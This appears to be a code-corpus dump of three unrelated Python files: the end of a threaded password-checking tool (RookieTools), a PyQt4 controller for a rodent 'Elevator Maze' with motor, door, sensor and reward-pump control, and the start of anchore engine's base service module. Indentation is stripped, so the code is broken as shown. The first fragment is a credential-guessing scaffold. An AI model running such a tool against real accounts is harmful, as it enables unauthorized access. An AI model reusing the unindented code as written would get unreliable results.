self.__password_task = self.password_task.copy()
thds = [Thread(target=self.work_in, args=(username,)) for _ in range(self.ThreadNumber)]
[thd.start() for thd in thds]
[thd.join() for thd in thds]
def pool(targets: list, obj: PassWordCheckBase):
warnings.warn("RookieTools.PasswordCheckBase.pool is deprecated since RookieTools 2.0."
"Use RookieTools.pool instead.", DeprecationWarning, stacklevel=2)
_pool = ThreadPoolExecutor()
_pool.map(obj, targets)
_pool.shutdown()
|
Test.py
|
# Refer to the following link for PyQt documentation:
# http://pyqt.sourceforge.net/Docs/PyQt4/classes.html
# Written for AMIS-30543 driver.
'''
At an RPM of 60 and an input of 200 steps in mode 1/1, takes motor 1 second to complete task
At an RPM of 120 and an input of 200 steps in mode 1/2, takes motor 1 second to complete task
'''
import sys
import RNELBanner_rc
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import QPalette
from serial import *
#imports for multithreading
from threading import Thread, Event
import multiprocessing
import math
import socket
import os
import signal
import RPi.GPIO as GPIO
##### imports for picamera
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import numpy as np
from scipy.misc import imresize
import globalvars
import struct
import Queue
##### end
minHeight, maxHeight = 0, 200000
#global doorclose
#doorclose = True
try:
arduino = Serial('/dev/ttyACM0', 9600)
print("successfully connected to orig arduino!")
except:
arduino = None
pass
try:
arduinoservodoor = Serial('/dev/ttyACM1', 9600)
print("successfully connected to servo arduino!")
except:
arduinoservodoor = None
pass
try:
arduinoCapSense = Serial('/dev/ttyACM2', 115200)
print("successfully connected to cap sensor arduino!")
except:
arduinoCapSense = None
pass
#doorclose = True
target = open("/home/kemerelab/Desktop/CapSenseData.out", 'w')
class Capacitance(QtCore.QThread):
# def __init__(self, threadID, name):
# Thread.__init__(self)
# self.threadID = threadID
# self.name = capacitiveSensorThread
def run(self):
while globalvars.quitThread == False:
if (arduinoCapSense is not None):
arduinoCapSense.flushInput()
capdatatotal = arduinoCapSense.readline()
target.write(capdatatotal)
self.emit(QtCore.SIGNAL('CAP'), capdatatotal)
time.sleep(1.5)
class Ui_Form(QtGui.QWidget):
def __init__(self):
super(Ui_Form, self).__init__()
self.currentPosition = 0
self.level_position = {1:0, 2:1000, 3:2000}
# self.doorclose = True
self.setupUi()
def closeEvent(self, event):
target.close()
globalvars.quitThread = True
time.sleep(1)
t2.join()
print "User has clicked the red x on the main window"
event.accept()
def setupUi(self):
#self.threadclass = level()
#self.threadclass.start()
#self.connect(self, QtCore.SIGNAL('LEVEL'), self.threadclass)
self.setWindowTitle("RNEL Elevator Controller")
rowSpacer = QtGui.QSpacerItem(1, 20)
columnSpacer = QtGui.QSpacerItem(50, 1)
# Highlight input that is currently selected
self.setFocusPolicy(QtCore.Qt.ClickFocus)
# Create UI elements
label_banner = QtGui.QLabel()
label_banner.setText("")
label_banner.setPixmap(QtGui.QPixmap(":/RNELicon/RNELBanner.png"))
font = QtGui.QFont("Helvetica", 12, 75)
font.setBold(True)
label_motorState = QtGui.QLabel("Stepper Motor Parameters")
label_motorState.setFont(font)
# label_task = QtGui.QLabel("Select a Task")
# label_time = QtGui.QLabel("Time Between Levels (seconds):")
label_steps = QtGui.QLabel("Distance (in):")
label_wheeldiameter = QtGui.QLabel("Wheel Diameter (in)")
label_direction = QtGui.QLabel("Direction:")
label_mode = QtGui.QLabel("Mode:")
#label_torque = QtGui.QLabel("Torque:")
label_capacitance = QtGui.QLabel("Capacitance: ") #LOOK HERE
label_capacitance.setFont(font)
self.capacitance = QtGui.QLCDNumber(self) #LOOK HERE
self.capacitance.setFont(font)
palette = QPalette()
# palette.setBrush(QtGui.QPalette.Light, QtCore.Qt.black)
brush = QtGui.QBrush(QtGui.QColor(0,0,0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
self.capacitance.setPalette(palette)
self.capacitance.setDigitCount(8)
self.threadclass = Capacitance()
self.threadclass.start()
self.connect(self.threadclass, QtCore.SIGNAL('CAP'), self.updateCapacitance)
self.capacitance.display(0) # just so something is there
# self.comboBox_task = QtGui.QComboBox()
# self.comboBox_task.addItems(["Alternating Reward Well Task", "Fixed Reward Well Task"])
# self.comboBox_task.setCurrentIndex(0)
self.lineEdit_time = QtGui.QLineEdit()
self.lineEdit_time.setMaximumSize(QtCore.QSize(100, 30))
self.lineEdit_time.setText("0")
self.lineEdit_distance = QtGui.QLineEdit()
self.lineEdit_distance.setMaximumSize(QtCore.QSize(100, 30))
self.lineEdit_distance.setText("0")
self.lineEdit_wheeldiameter = QtGui.QLineEdit()
self.lineEdit_wheeldiameter.setText("1")
self.comboBox_direction = QtGui.QComboBox()
self.comboBox_direction.addItems(["Up", "Down"])
self.comboBox_mode = QtGui.QComboBox()
self.comboBox_mode.addItems(["1/1", "1/2", "1/4", "1/8", "1/16", "1/32", "1/64", "1/128"])
self.comboBox_mode.setCurrentIndex(0)
#self.comboBox_torque = QtGui.QComboBox()
#self.comboBox_torque.addItems(["10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%"])
#self.comboBox_torque.setCurrentIndex(4)
#Preset Levels >>> assign each to a 12" distance later
self.preset_checkbox = QtGui.QCheckBox("Use preset elevator levels")
self.preset_checkbox.setCheckState(False)
self.preset_checkbox.setTristate(False)
label_level = QtGui.QLabel("Level:")
self.comboBox_level = QtGui.QComboBox()
self.comboBox_level.addItems(["1", "2", "3"])
self.comboBox_level.setEnabled(False)
label_assign = QtGui.QLabel("Assign position to level?")
self.btn_assign = QtGui.QPushButton("Assign")
self.btn_assign.setEnabled(False)
self.btn_run = QtGui.QPushButton("Run")
self.btn_doorstat = QtGui.QPushButton("Open/Close")
self.progress_bar = QtGui.QProgressBar()
self.btn_doorstat = QtGui.QPushButton("Open/Close")
label_history = QtGui.QLabel("Command History")
label_history.setFont(font)
self.command_history = QtGui.QPlainTextEdit()
self.command_history.setMaximumSize(QtCore.QSize(1000, 500))
self.command_history.setReadOnly(True)
self.command_history.appendPlainText("Note: The speed will be scaled according to the microstepping mode.")
self.command_history.appendPlainText("Note: The time and distance inputs must be positive integers. Numbers that are not integers will be rounded down.")
self.command_history.appendPlainText("")
font = QtGui.QFont("Helvetica", 12)
label_instructions = QtGui.QLabel("Please visit the following site for instructions:")
label_instructions.setFont(font)
label_website = QtGui.QLabel()
label_website.setFont(font)
label_website.setText("<a href=\"https://github.com/kemerelab/Elevator/\">Elevator Maze</a>")
label_website.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
label_website.setOpenExternalLinks(True)
# Format UI elements
formLayout = QtGui.QFormLayout()
formLayout.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
formLayout.setLabelAlignment(QtCore.Qt.AlignLeft)
formLayout.addRow(label_time, self.lineEdit_time)
formLayout.addRow(label_steps, self.lineEdit_distance)
formLayout.addRow(label_direction, self.comboBox_direction)
formLayout.addRow(label_mode, self.comboBox_mode)
#formLayout.addRow(label_torque, self.comboBox_torque)
formLayout.addRow(label_wheeldiameter, self.lineEdit_wheeldiameter)
formLayout2 = QtGui.QFormLayout()
formLayout2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
formLayout2.setLabelAlignment(QtCore.Qt.AlignLeft)
formLayout2.addRow(label_level, self.comboBox_level)
formLayout2.addRow(label_capacitance, self.capacitance) #LOOK HERE
verticalLayout = QtGui.QVBoxLayout()
verticalLayout.addWidget(self.preset_checkbox)
verticalLayout.addLayout(formLayout2)
verticalLayout.addStretch()
verticalLayout.addWidget(label_assign)
verticalLayout.addWidget(self.btn_assign, 0, QtCore.Qt.AlignHCenter)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.addLayout(formLayout)
horizontalLayout.addSpacerItem(columnSpacer)
horizontalLayout.addLayout(verticalLayout)
verticalLayout2 = QtGui.QVBoxLayout(self)
verticalLayout2.setContentsMargins(30, 20, 30, 20)
verticalLayout2.setSizeConstraint(QtGui.QLayout.SetFixedSize)
verticalLayout2.addWidget(label_banner, 0, QtCore.Qt.AlignHCenter)
verticalLayout2.addSpacerItem(rowSpacer)
verticalLayout2.addWidget(label_motorState)
verticalLayout2.addLayout(horizontalLayout)
verticalLayout2.addWidget(self.btn_run, 0, QtCore.Qt.AlignHCenter)
verticalLayout2.addWidget(self.btn_doorstat, 0, QtCore.Qt.AlignRight)
verticalLayout2.addWidget(self.progress_bar)
verticalLayout2.addSpacerItem(rowSpacer)
formLayout3 = QtGui.QFormLayout()
verticalLayout2.addLayout(formLayout3)
formLayout3.addRow(label_capacitance, self.capacitance) #LOOK HERE
verticalLayout2.addWidget(label_history)
verticalLayout2.addWidget(self.command_history)
verticalLayout2.addSpacerItem(rowSpacer)
verticalLayout2.addWidget(label_instructions)
verticalLayout2.addWidget(label_website)
self.btn_run.clicked.connect(self.collectMotorData)
self.btn_doorstat.clicked.connect(self.sendServoData)
self.preset_checkbox.stateChanged.connect(self.updateUI)
self.comboBox_level.currentIndexChanged.connect(self.updateUI)
self.btn_assign.clicked.connect(self.assignPosition)
self.btn_assign.clicked.connect(self.updateUI)
def updateCapacitance(self, val):
self.capacitance.display(val)
def calculateSteps (self):
"""
        Distance to be traveled divided by the circumference of the wheel (distance
        covered in one rotation), then multiplied by 200 (full steps in one rotation
        of the stepper) and by the microstepping divisor, to find the number of
        microsteps that need to be taken to reach the desired location.
"""
print(float(self.lineEdit_distance.text()))
self.steppersteps = (float(self.lineEdit_distance.text()) / (math.pi * float(self.lineEdit_wheeldiameter.text()))) * (200 * float(self.comboBox_mode.currentText()[2:]))
print(self.steppersteps)
return self.steppersteps
def delay(self):
"""
        Total time for a level change divided by 2 times the number of microsteps
        required for the desired distance change (to account for rests between
        steps); the microstep count already reflects the microstepping mode.
"""
#Delay times are approximations as the steps will be rounded later
self.delaytime = float(self.lineEdit_time.text()) / (2 * float(self.steppersteps))
self.delaytime *= 1000
print("delay:", self.delaytime)
return self.delaytime
def reqRPM(self):
"""
        Find the required speed from the number of microsteps needed for the desired
        distance, divided by 200 full steps per revolution times the microstepping mode.
"""
reqspeed = (self.steppersteps)/(200 * int(self.comboBox_mode.currentText()[2:]))
reqspeed_valid = True
if reqspeed > 200 or reqspeed < 0:
reqspeed_valid = False
print(reqspeed)
return reqspeed, reqspeed_valid
def collectMotorData(self):
#speed, speed_valid = QtCore.QString.toFloat(self.lineEdit_speed.text())
#torque = str(self.comboBox_torque.currentText()[0])
# If preset levels are used, calculate steps and direction
#### NEEDS TO BE REDONE********
#Not using preset levels
if self.preset_checkbox.checkState() == 2:
steps_valid = True
steps, direction = self.level_calculations()
else:
#steps, steps_valid = QtCore.QString.toFloat(self.lineEdit_distance.text())
steps = int(self.calculateSteps())
direction = str(self.comboBox_direction.currentText())
if direction == "Up" and steps >= maxHeight - self.currentPosition:
steps_valid = True
elif direction == 'Down' and steps <= self.currentPosition - minHeight:
steps_valid = True
else:
steps_valid = False
speed, speed_valid = self.reqRPM()
stepdelay = self.delay()
#if speed_valid == False or steps_valid == False:
# self.errorMessage(0)
#if speed == 0 and speed_valid == True:
# self.errorMessage(1)
#if speed > 200 or speed < 0:
# self.errorMessage(2)
#self.level_position(2)
# speed = 0
# steps = 0
#speed = int(speed)
#if(speed != 0):
#if steps == 0 and steps_valid == True:
#if self.preset_checkbox.checkState() == 0:
# self.errorMessage(3)
#if self.preset_checkbox.checkState() == 2:
# self.errorMessage(6)
#if steps < 0:
# self.errorMessage(8)
# steps = 0
#steps = int(steps)
# Do not step past the top and bottom of the maze
if direction == "Up" and speed != 0:
if steps > maxHeight - self.currentPosition:
self.errorMessage(4)
steps = maxHeight - self.currentPosition
self.currentPosition += int(steps)
if direction == "Down" and speed != 0:
if steps > self.currentPosition - minHeight:
self.errorMessage(5)
steps = self.currentPosition - minHeight
self.currentPosition -= int(steps)
# Using a microstepping mode of 1/2, for example, halves the number of steps
# Multiply the number of steps by the reciprocal of the mode
# This will not affect position tracking as it occurs after position tracking
#print (mode)
self.sendMotorData(str(speed), str(int(self.steppersteps)), self.comboBox_mode.currentText()[2:], direction, str(stepdelay))
def sendMotorData(self, speed, steps, mode, direction, delay):
self.btn_run.setEnabled(False)
#while len(speed) < 4:
# speed = "0" + speed
#while len(steps) < 8:
# steps = "0" + steps
#while len(mode) < 3:
# mode = "0" + mode
#while len(delay) < 6:
# delay = "0" + delay
data = str('x'+speed+'x'+steps+'x'+mode+'x'+delay+'x'+direction)
print("stepper data:", data)
self.command_history.appendPlainText(data)
self.command_history.appendPlainText("Estimated time required (seconds): " + self.lineEdit_time.text())
# self.sendServoData()
try:
arduino.write(data)
self.update_progress(int(self.steppersteps))
#arduino.write("On")
# In a separate thread, block new inputs until Arduino is ready
#if self.steps != 0:
#self.progress_bar.setRange(0, self.steps)
#self.motor_progress = update_thread(self.steps)
#self.motor_progress.start()
#self.motor_progress.bar_value.connect(self.update_progress)
#else:
#self.update_progress(0)
except:
self.command_history.appendPlainText("The Arduino is not connected.")
self.btn_run.setEnabled(True)
#### I think hall effect sensor reading should go here
self.command_history.appendPlainText("Current position: " + str(self.currentPosition))
self.command_history.appendPlainText("")
def sendServoData(self):
if globalvars.doorclose:
try:
arduinoservodoor.write("0")
globalvars.doorclose = not globalvars.doorclose
if(globalvars.doorclose):
print("Door Closed")
else:
print("Door Open")
if(arduinoCapSense is not None):
target.write("door open\n")
except:
self.command_history.appendPlainText("Error reading from servo arduino\n")
else:
try:
arduinoservodoor.write("90")
globalvars.doorclose = not globalvars.doorclose
if(globalvars.doorclose):
print("Door Closed")
else:
print("Door Open")
try:
#while True:
if(arduinoCapSense is not None):
arduinoCapSense.flushInput()
capdata = arduinoCapSense.readline()
target.write(capdata)
target.write("door closed\n")
#target.write("\n")
print capdata
#values = line.decode('ascii').split(':')
#print arduinoCapSense.readline()
#print (values)
# time.sleep(0.001)
#for byte in arduinoCapSense.read():
#print(ord(byte))
#byte_range = bytearray(b'\x85W\xe2\xa2I')
#date_header = struct.unpack('>BL', byte_range)
except:
self.command_history.appendPlainText("Error writing to capacitive sensor arduino\n")
except:
self.command_history.appendPlainText("Error writing to servo arduino\n")
def level_calculations(self):
# This method is called in collectMotorData() and updateUI()
current_level = int(self.comboBox_level.currentText())
#self.emit(QtCore.SIGNAL('LEVEL'), current_level)
steps = abs(self.currentPosition - self.level_position[current_level])
if self.currentPosition > self.level_position[current_level]:
direction = "Down"
else:
direction = "Up"
return steps, direction
def assignPosition(self):
# Reassign elevator levels if necessary
current_level = int(self.comboBox_level.currentText())
difference = self.currentPosition - self.level_position[current_level]
if difference != 0:
for level in self.level_position.keys():
self.level_position[level] += difference
self.command_history.appendPlainText("New level positions:")
else:
self.errorMessage(7)
self.command_history.appendPlainText("Current level positions:")
self.command_history.appendPlainText("Level 1: " + str(self.level_position[1]))
self.command_history.appendPlainText("Level 2: " + str(self.level_position[2]))
self.command_history.appendPlainText("Level 3: " + str(self.level_position[3]))
self.command_history.appendPlainText("")
def updateUI(self):
steps, direction = self.level_calculations()
# If preset levels are used, disable corresponding manual inputs
if self.preset_checkbox.checkState() == 0:
self.lineEdit_distance.setEnabled(True)
self.lineEdit_distance.setText("0")
self.comboBox_direction.setEnabled(True)
self.comboBox_level.setEnabled(False)
self.btn_assign.setEnabled(False)
if self.preset_checkbox.checkState() == 2:
self.lineEdit_distance.setEnabled(False)
self.lineEdit_distance.setText(str(steps))
self.comboBox_direction.setEnabled(False)
if direction == "Up":
self.comboBox_direction.setCurrentIndex(0)
else:
self.comboBox_direction.setCurrentIndex(1)
self.comboBox_level.setEnabled(True)
self.btn_assign.setEnabled(True)
def errorMessage(self, num):
invalid_box = QtGui.QMessageBox()
invalid_box.setIcon(QtGui.QMessageBox.Warning)
if num == 0:
invalid_box.setText("<br>Invalid input(s).")
invalid_box.setInformativeText("<big>Inputs must be numbers.")
if num == 1:
invalid_box.setText("<br>The speed has not been set.")
invalid_box.setInformativeText("<big>Please set a speed to start the motor.")
if num == 2:
invalid_box.setText("<br>The speed cannot be set.")
invalid_box.setInformativeText("<big>The speed must be greater than 0 but less than the maximum RPM of 150. The steps have been set to 0. Please try again at a lower speed.")
if num == 3:
invalid_box.setText("<br>The distance has not been set.")
invalid_box.setInformativeText("<big>Please set a distance to start the motor.")
if num == 4:
invalid_box.setText("<br>Distance exceeds maze height.")
invalid_box.setInformativeText("<big>The elevator will stop at the top of the maze.")
if num == 5:
invalid_box.setText("<br>Distance exceeds bottom of maze.")
invalid_box.setInformativeText("<big>The elevator will stop at the bottom of the maze.")
if num == 6:
invalid_box.setText("<br>The distance cannot be set.")
invalid_box.setInformativeText("<big>The elevator is already on this level.")
if num == 7:
invalid_box.setText("<br>The levels cannot be assigned.")
invalid_box.setInformativeText("<big>This level is already assigned to the current position.")
if num == 8:
invalid_box.setText("<br>The distance cannot be set.")
invalid_box.setInformativeText("<big>The number of steps must be greater than 0.")
invalid_box.exec_()
def update_progress(self, num):
self.progress_bar.setValue(num)
#self.btn_run.setText(str(num) + "/" + str(int(self.steppersteps)))
# Allow new input when motor is done stepping
if num == int(self.steppersteps):
self.btn_run.setText("Run")
self.btn_run.setEnabled(True)
self.progress_bar.reset()
#if self.preset_checkbox.checkState() == 2:
self.updateUI()
class update_thread(QtCore.QThread):
bar_value = QtCore.pyqtSignal(int)
def __init__(self, steps):
super(update_thread, self).__init__()
self.steps = steps
def run(self):
# Track steps completed by reading serial port
all_entries = []
step_entry = []
lencount = len(all_entries)
count = 0
while len(all_entries) < self.steps:
if lencount == len(all_entries):
count += 1
if count > 5:
self.bar_value.emit(self.steps)
break
lencount = len(all_entries)
for byte in arduino.read():
count = 0
#print (byte)
step_entry.append(byte)
#print (step_entry)
#length of previous all_entries
#compare to current length
#if value is same increment counter
#update lencount
if byte == '\n':
all_entries.append(step_entry)
#print(all_entries)
self.bar_value.emit(len(all_entries))
step_entry = []
#print (len(all_entries),"moo", count)
class level(QtCore.QThread): #shows what level we are on and will run the reward wells
def run (self):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
checker1 = 1
checker2 = 0
trigger1 = 26
pump1 = 13
trigger2 = 21
pump2 = 16
GPIO.setup(pump1, GPIO.OUT)
GPIO.setup(trigger1, GPIO.IN)
GPIO.setup(pump2, GPIO.OUT)
GPIO.setup(trigger2, GPIO.IN)
#for outputs, 0 enables pump and 1 turns it off
while True:
if GPIO.input(trigger1) == True and checker1 == 1:
GPIO.output(pump1, 0)
print "triggering reward! :)"
time.sleep(5)
GPIO.output(pump1,1)
checker1 = 0
checker2 = 1
else:
GPIO.output(pump2,1)
if GPIO.input(trigger2) == True and checker2 == 1:
GPIO.output(pump2, 0)
print "triggering reward again! :)"
time.sleep(5)
GPIO.output(pump2,1)
checker2 = 0
checker1 = 1
else:
GPIO.output(pump1,1)
class receiving(QtCore.QThread):
def run(self):
UDP_IPr = "127.0.0.1"
UDP_PORTr = 5005
sockr = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
sockr.bind((UDP_IPr, UDP_PORTr))
while True:
data, addr = sockr.recvfrom(1024) # buffer size is 1024 bytes
data = float (data)
self.emit(QtCore.SIGNAL('CAP'), data)
#def collectServoData(self, q):
# doorclose = self.doorclose
# q.put(doorclose)
def callPiCamDisplay():
os.system('python PiCamDisplay.py')
#def callRewardWell1():
# os.system('python RewardWellLevel1.py')
#def callRewardWell2():
# os.system('python RewardWellLevel2.py')
#def callRewardWell3():
# os.system('python RewardWellLevel3.py')
#def callRewardWell():
#os.system('python RewardWell.py')
def callRewardWells():
HIGH = 0
LOW = 1
# doorclose = Event()
# if not obj:
# doorclose.set()
# elif obj:
# doorclose.clear()
# print obj
# print doorclose
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
wellnum = 0
### NO NEED FOR CHECKERS ANYMORE WITH NEW TASK
checker1 = 1
    checker2 = 1
    checker3 = 1
checker4 = 1
# checker5 = 1
# checker6 = 1
trigger1 = 15
pump1 = 17
    trigger2 = 18
    pump2 = 22
    trigger3 = 23 #might cause an error, 4 or 04
    pump3 = 10 #might cause an error, 2 or 02
trigger4 = 24
pump4 = 11
# trigger5 = 25
# pump5 = 13
# trigger6 = 8
# pump6 = 26
cap_resetpin = 21
GPIO.setup(cap_resetpin, GPIO.OUT)
GPIO.setup(pump1, GPIO.OUT)
GPIO.setup(trigger1, GPIO.IN)
    GPIO.setup(pump2, GPIO.OUT)
    GPIO.setup(trigger2, GPIO.IN)
    GPIO.setup(pump3, GPIO.OUT)
    GPIO.setup(trigger3, GPIO.IN)
GPIO.setup(pump4, GPIO.OUT)
GPIO.setup(trigger4, GPIO.IN)
# GPIO.setup(pump5, GPIO.OUT)
# GPIO.setup(trigger5, GPIO.IN)
# GPIO.setup(pump6, GPIO.OUT)
# GPIO.setup(trigger6, GPIO.IN)
#for outputs, 0 enables pump and 1 turns it off
GPIO.output(pump1, LOW)
# # GPIO.output(pump2, LOW)
# GPIO.output(pump3, LOW)
GPIO.output(pump4, LOW)
# GPIO.output(pump5, LOW)
# GPIO.output(pump6, LOW)
GPIO.output(cap_resetpin, LOW)
while globalvars.quitThread == False:
#print obj
time.sleep(0.05)
if globalvars.doorclose:
# doorclose.set()
if wellnum == 1:
# checker2 = 1
wellnum = 0
#print checker2
elif wellnum == 2:
# checker1 = 1
wellnum = 0
#print checker1
elif wellnum == 3:
# checker4 = 1
wellnum = 0
#print checker4
elif wellnum == 4:
# checker3 = 1
wellnum = 0
#print checker3
# elif wellnum == 5:
# checker6 = 1
# wellnum = 0
# #print checker6
# elif wellnum == 6:
# checker5 = 1
# wellnum = 0
# #print checker5
elif not globalvars.doorclose and wellnum == 0:
# doorclose.clear()
trig1input = GPIO.input(trigger1)
#print(trig1input)
trig2input = GPIO.input(trigger2)
#print(trig2input)
if trig1input == True and checker1 == 1:
GPIO.output(pump1, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 1"
checker2 = 0
time.sleep(1)
GPIO.output(pump1, LOW)
GPIO.output(cap_resetpin, LOW)
checker1 = 0
wellnum = 1
# print checker2
# doorclose.wait()
checker2 = 1
print checker2
elif trig2input == True and checker2 == 1:
GPIO.output(pump2, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 2"
checker1 = 0
time.sleep(1)
GPIO.output(pump2, LOW)
GPIO.output(cap_resetpin, LOW)
checker2 = 0
wellnum = 2
# print checker1
print wellnum
# doorclose.wait()
checker1 = 1
# print checker1
            elif GPIO.input(trigger3) == True and checker3 == 1:
GPIO.output(pump3, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 3"
checker4 = 0
time.sleep(1)
GPIO.output(pump3, LOW)
GPIO.output(cap_resetpin, LOW)
checker3 = 0
wellnum = 3
print wellnum
# print checker4
# doorclose.wait()
checker4 = 1
# print checker4
elif GPIO.input(trigger4) == True and checker4 == 1:
GPIO.output(pump4, HIGH)
GPIO.output(cap_resetpin, HIGH)
print "triggering reward! :) 4"
checker3 = 0
time.sleep(1)
GPIO.output(pump4, LOW)
GPIO.output(cap_resetpin, LOW)
checker4 = 0
wellnum = 4
# print checker3
# doorclose.wait()
checker3 = 1
print checker3
# elif GPIO.input(trigger5) == True and checker5 == 1:
# GPIO.output(pump5, HIGH)
# GPIO.output(cap_resetpin, HIGH)
# print "triggering reward! :) 5"
# checker6 = 0
# time.sleep(1)
# GPIO.output(pump5, LOW)
# GPIO.output(cap_resetpin, LOW)
# checker5 = 0
# wellnum = 5
# # print checker6
# # doorclose.wait()
# checker6 = 1
# print checker6
# elif GPIO.input(trigger6) == True and checker6 == 1:
# GPIO.output(pump6, HIGH)
# GPIO.output(cap_resetpin, HIGH)
# print "triggering reward! :) 6"
# checker5 = 0
# time.sleep(1)
# GPIO.output(pump6, LOW)
# GPIO.output(cap_resetpin, LOW)
# checker6 = 0
# wellnum = 6
# # print checker5
# # doorclose.wait()
# checker5 = 1
# print checker5
t2 = Thread(target = callRewardWells, args = ())
if __name__ == '__main__':
# p = multiprocessing.Process(target = callPiCamDisplay)
# p.start()
#time.sleep(5)
#os.kill(p.pid, signal.SIGKILL)
# q = multiprocessing.Process(target = callRewardWell1)
# q.start()
# w = multiprocessing.Process(target = callRewardWell2)
# w.start()
# e = multiprocessing.Process(target = callRewardWell3)
# e.start()
#global doorclose
globalvars.doorclose = True
#print globalvars.doorclose in globals()
#print "It's okay if it's false b/c you have import access to it"
app = QtGui.QApplication(sys.argv)
ex = Ui_Form()
ex.show()
ex.raise_()
# q = Queue.Queue()
# t1 = Thread(target = collectServoData, args = (ex.doorclose))
#t2 = Thread(target = callRewardWells, args = ())
# t1.start()
t2.start()
t = time.time()
elapsed = time.time() - t
while elapsed < (60 * 60):
arduino.write("x3.81971863421x97784x128x0.0153398078789xUp")
arduino.write("x3.18309886184e-08x0x1x235619449.019xUp")
time.sleep(15)
arduino.write("x3.81971863421x97784x128x0.0153398078789xDown")
arduino.write("x3.18309886184e-08x0x1x235619449.019xUp")
time.sleep(15)
elapsed = time.time() - t
# ex.raise_()
sys.exit(app.exec_())
#target.close()
#print "closed!"
# t1.join()
#t2.join()
|
service.py
|
"""
Base types for all anchore engine services
"""
import copy
import connexion
import enum
from flask import g, jsonify
import json
import os
from pathlib import Path
import yaml
import time
import threading
import traceback
from anchore_engine.configuration import localconfig
from anchore_engine.subsys import logger, metrics, servicestatus, taskstate
from anchore_engine import monitors
from anchore_engine.db import db_services, session_scope, initialize as initialize_db
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.apis.authorization import init_authz_handler, get_authorizer
from anchore_engine.subsys.events import ServiceAuthzPluginHealthCheckFail
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services.catalog import CatalogClient
from anchore_engine.configuration.localconfig import OauthNotConfiguredError, InvalidOauthConfigurationError
from anchore_engine.apis.exceptions import AnchoreApiError
from anchore_engine.common.helpers import make_response_error
class LifeCycleStages(enum.IntEnum):
"""
Ordered lifecycle stages by execution order
"""
pre_config = 0
post_config = 1
pre_db = 2
post_db = 3
pre_credentials = 4
post_credentials = 5
pre_bootstrap = 6
post_bootstrap = 7
pre_register = 8
post_register = 9
# Default handlers set at system level, will be modified by instantiation of BaseService at instance-level
_default_lifecycle_handlers = {
LifeCycleStages.pre_config: [],
LifeCycleStages.post_config: [],
LifeCycleStages.pre_db: [],
LifeCycleStages.post_db: [],
LifeCycleStages.pre_credentials: [],
LifeCycleStages.post_credentials: [],
LifeCycleStages.pre_bootstrap: [],
LifeCycleStages.post_bootstrap: [],
LifeCycleStages.pre_register: [],
LifeCycleStages.post_register: []
}
def handle_api_exception(ex: AnchoreApiError):
"""
Returns the proper json for marshalling an AnchoreApiError
:param ex:
:return:
"""
return jsonify(make_response_error(ex.message, in_httpcode=ex.__response_code__, details=ex.detail if ex.detail else {})), ex.__response_code__
class ServiceMeta(type):
"""
Metaclass to create a registry for all subclasses of Gate for finding, building, and documenting the services
"""
def __init__(cls, name, bases, dct):
if not hasattr(cls, 'registry'):
cls.registry = {}
else:
if '__service_name__' in dct:
svc_id = dct['__service_name__'].lower()
cls.registry[svc_id] = cls
super(ServiceMeta, cls).__init__(name, bases, dct)
def get_service_by_name(cls, name):
# Try direct name
found = cls.registry.get(name.lower())
if found:
return found
else:
raise KeyError(name)
def registered_service_types(cls):
return list(cls.registry.keys())
class BaseService(object, metaclass=ServiceMeta):
"""
Base type for all services to inherit from.
An anchore engine service always has:
healthcheck api - GET /health responds with 200 OK.
monitor thread - to schedule async tasks and handle service status updates upstream
versioned api - /vX/...
Services have similar bootstrap and initialization path:
self.configure() - load config
self.db_connect() - setup db connections
self.credential_init() - load system credentials
self.bootstrap() - service-specific bootstrap that involves db and maybe other services
self.register() - register the service in the db for discoverability
These are all invoked in order from the bootstrap() function directly.
Class variables:
__is_unique_service__ = determines whether the system should allow more than one of this service instance to be registered.
__service_name__ = The name used to identify this service class in both the service records and in config.
__db_enabled__ = True|False determines if this service depends on the db and should connect (default = True)
__monitors__ = Dict of monitor configurations for this service
__monitor_fn__ = Function to invoke as base thread monitor
__service_api_version__ = str version name to use as prefix for api calls: e.g. /<__service_api_version__>/images
__lifecycle_handlers__ = dict of mappings from LifeCycleStages to (function, arg) pairs to merge into the global defaults on instantiation
"""
__is_unique_service__ = False
__service_name__ = None
__db_enabled__ = True
__monitors__ = {}
__monitor_fn__ = monitors.monitor
__service_api_version__ = 'v1'
__lifecycle_handlers__ = {}
__require_system_user__ = True
__task_handlers_enabled__ = True
def __init__(self, options=None):
self.name = self.__service_name__
self.options = options if options is not None else {}
self.global_configuration = None
self.requires_db = None
self.require_system_user = self.__require_system_user__
self.lifecycle_handlers = copy.deepcopy(_default_lifecycle_handlers)
self.lifecycle_handlers.update(self.__lifecycle_handlers__)
self.instance_id = None
self.versions = None
self.configuration = None
self.fq_name = None
self.monitor_fn = self.__monitor_fn__
self.monitor_kwargs = {}
self.monitor_threads = {}
self.service_record = {}
self.task_handlers_enabled = self.__task_handlers_enabled__
@property
def is_enabled(self):
if self.configuration:
return self.configuration.get('enabled', False)
else:
return False
def _register_instance_handlers(self):
"""
Called before the bootstrap process is initiated to allow overriding classes to modify the handlers
:return:
"""
return
def _process_stage_handlers(self, stage):
logger.info('Processing init handlers for bootstrap stage: {}'.format(stage.name))
handlers = self.lifecycle_handlers.get(stage, [])
logger.debug('Executing {} stage {} handlers'.format(len(handlers), stage.name))
for handler_fn, handler_args in handlers:
try:
logger.debug('Invoking handler: {} with args {}'.format(handler_fn.__name__, handler_args))
if handler_args is not None:
handler_fn(*handler_args)
else:
handler_fn()
logger.debug('Handler: {} completed successfully'.format(handler_fn.__name__))
except Exception as ex:
logger.exception('Stage handler {} for stage {} raised exception'.format(handler_fn.__name__, stage.name))
raise ex
